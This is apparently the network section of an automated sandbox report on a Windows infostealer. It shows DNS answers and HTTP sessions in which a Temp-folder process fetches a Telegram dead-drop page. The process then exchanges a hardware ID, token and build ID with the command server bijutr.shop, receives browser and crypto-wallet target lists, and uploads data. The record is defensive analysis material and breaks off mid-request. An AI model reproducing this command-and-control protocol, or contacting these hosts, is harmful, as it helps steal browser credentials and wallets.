Dec 27, 2024 07:10:28.469239950 CET | 1.1.1.1 | 192.168.2.7 | 0x5749 | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.181.65 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:28.708086967 CET | 1.1.1.1 | 192.168.2.7 | 0x1529 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 07:10:29.061450958 CET | 1.1.1.1 | 192.168.2.7 | 0xf5ac | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:29.061450958 CET | 1.1.1.1 | 192.168.2.7 | 0xf5ac | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:29.064171076 CET | 1.1.1.1 | 192.168.2.7 | 0xc983 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 27, 2024 07:10:29.065757036 CET | 1.1.1.1 | 192.168.2.7 | 0x5aa3 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:29.065757036 CET | 1.1.1.1 | 192.168.2.7 | 0x5aa3 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:29.160265923 CET | 1.1.1.1 | 192.168.2.7 | 0x513b | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 27, 2024 07:10:29.196365118 CET | 1.1.1.1 | 192.168.2.7 | 0xa800 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:29.196365118 CET | 1.1.1.1 | 192.168.2.7 | 0xa800 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:29.196378946 CET | 1.1.1.1 | 192.168.2.7 | 0xda51 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 27, 2024 07:10:32.816265106 CET | 1.1.1.1 | 192.168.2.7 | 0x461e | No error (0) | sb.scorecardresearch.com | | 18.165.220.66 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:32.816265106 CET | 1.1.1.1 | 192.168.2.7 | 0x461e | No error (0) | sb.scorecardresearch.com | | 18.165.220.106 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:32.816265106 CET | 1.1.1.1 | 192.168.2.7 | 0x461e | No error (0) | sb.scorecardresearch.com | | 18.165.220.110 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:32.816265106 CET | 1.1.1.1 | 192.168.2.7 | 0x461e | No error (0) | sb.scorecardresearch.com | | 18.165.220.57 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:10:32.823709011 CET | 1.1.1.1 | 192.168.2.7 | 0x8dbc | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 07:10:32.824589014 CET | 1.1.1.1 | 192.168.2.7 | 0xccdf | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 07:10:32.848797083 CET | 1.1.1.1 | 192.168.2.7 | 0x55 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 07:10:32.848797083 CET | 1.1.1.1 | 192.168.2.7 | 0x55 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
• t.me
• bijutr.shop
• www.google.com
• chrome.cloudflare-dns.com
• clients2.googleusercontent.com
• https:
  • assets.msn.com
  • c.msn.com
  • sb.scorecardresearch.com
  • browser.events.data.msn.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49760 | 149.154.167.99 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:52 UTC | 85 | OUT | GET /k04ael HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:09:53 UTC | 511 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 27 Dec 2024 06:09:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12298
Connection: close
Set-Cookie: stel_ssid=3729f20303e52c377b_3301121134632751003; expires=Sat, 28 Dec 2024 06:09:52 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=35768000
2024-12-27 06:09:53 UTC | 12298 | IN
                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49766 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:55 UTC | 231 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-27 06:09:55 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:09:55 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
2024-12-27 06:09:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
2 | 192.168.2.7 | 49771 | 188.245.216.205 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:57 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----58Y589HL6P8QIEKNG47Q
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 255
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-27 06:09:57 UTC | 255 | OUT
                                                                                                                                                                                                                                                                                      Data Ascii: ------58Y589HL6P8QIEKNG47QContent-Disposition: form-data; name="hwid"4C8D06A96EF2427740442-a33c7340-61ca------58Y589HL6P8QIEKNG47QContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------58Y589HL6P8QIEKNG47Q--
2024-12-27 06:09:58 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:09:58 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
2024-12-27 06:09:58 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 3a1|1|1|1|f8090c1106931fd0bd02c352c03692b3|1|0|1|1|0|50000|00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49776 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:00 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----QIWT0R9H4EUAAIWBA16F
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-27 06:10:00 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                      Data Ascii: ------QIWT0R9H4EUAAIWBA16FContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------QIWT0R9H4EUAAIWBA16FContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------QIWT0R9H4EUAAIWBA16FCont
2024-12-27 06:10:01 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:00 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
2024-12-27 06:10:01 UTC | 2192 | IN
                                                                                                                                                                                                                                                                                      Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49781 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:02 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----WLN79ZCTRI58YUAI5PZ5
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-27 06:10:02 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                      Data Ascii: ------WLN79ZCTRI58YUAI5PZ5Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------WLN79ZCTRI58YUAI5PZ5Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------WLN79ZCTRI58YUAI5PZ5Cont
2024-12-27 06:10:03 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:03 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
2024-12-27 06:10:03 UTC | 5837 | IN |
                                                                                                                                                                                                                                                                                      Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49782 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:05 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----K6XT0RIWTRQQQI5XT00R
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 332
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-27 06:10:05 UTC | 332 | OUT |
                                                                                                                                                                                                                                                                                      Data Ascii: ------K6XT0RIWTRQQQI5XT00RContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------K6XT0RIWTRQQQI5XT00RContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------K6XT0RIWTRQQQI5XT00RCont
2024-12-27 06:10:06 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:05 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
2024-12-27 06:10:06 UTC | 119 | IN |
                                                                                                                                                                                                                                                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49783 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:07 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----8GDBAS0ZU37YUAS0ZM7Q
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 6981
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-27 06:10:07 UTC | 6981 | OUT |
                                                                                                                                                                                                                                                                                      Data Ascii: ------8GDBAS0ZU37YUAS0ZM7QContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------8GDBAS0ZU37YUAS0ZM7QContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------8GDBAS0ZU37YUAS0ZM7QCont
2024-12-27 06:10:08 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:08 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
2024-12-27 06:10:08 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49784 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:08 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----9ZUS2DTRQIE3EUS26P8G
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 489
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-27 06:10:08 UTC | 489 | OUT |
                                                                                                                                                                                                                                                                                      Data Ascii: ------9ZUS2DTRQIE3EUS26P8GContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------9ZUS2DTRQIE3EUS26P8GContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------9ZUS2DTRQIE3EUS26P8GCont
2024-12-27 06:10:09 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:09 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
2024-12-27 06:10:09 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49787 | 172.217.21.36 | 443 | 7992 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:11 UTC | 595 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
2024-12-27 06:10:12 UTC | 1266 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:12 GMT
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-nAYNrubv6A4eDbE5h51ZCg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49789 | 172.217.21.36 | 443 | 7992 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:11 UTC | 353 | OUT | GET /async/ddljson?async=ntp:2 HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49790 | 172.217.21.36 | 443 | 7992 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:11 UTC | 498 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-27 06:10:12 UTC | 1018 | IN | HTTP/1.1 200 OK
Version: 705503573
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Fri, 27 Dec 2024 06:10:12 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 49794 | 172.217.21.36 | 443 | 7992 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:12 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
2024-12-27 06:10:12 UTC | 933 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Version: 705503573
                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:12 GMT
                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
2024-12-27 06:10:12 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-27 06:10:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49805 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:16 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----SR1N7YM7GVAAIE3O8Q90
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 505
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
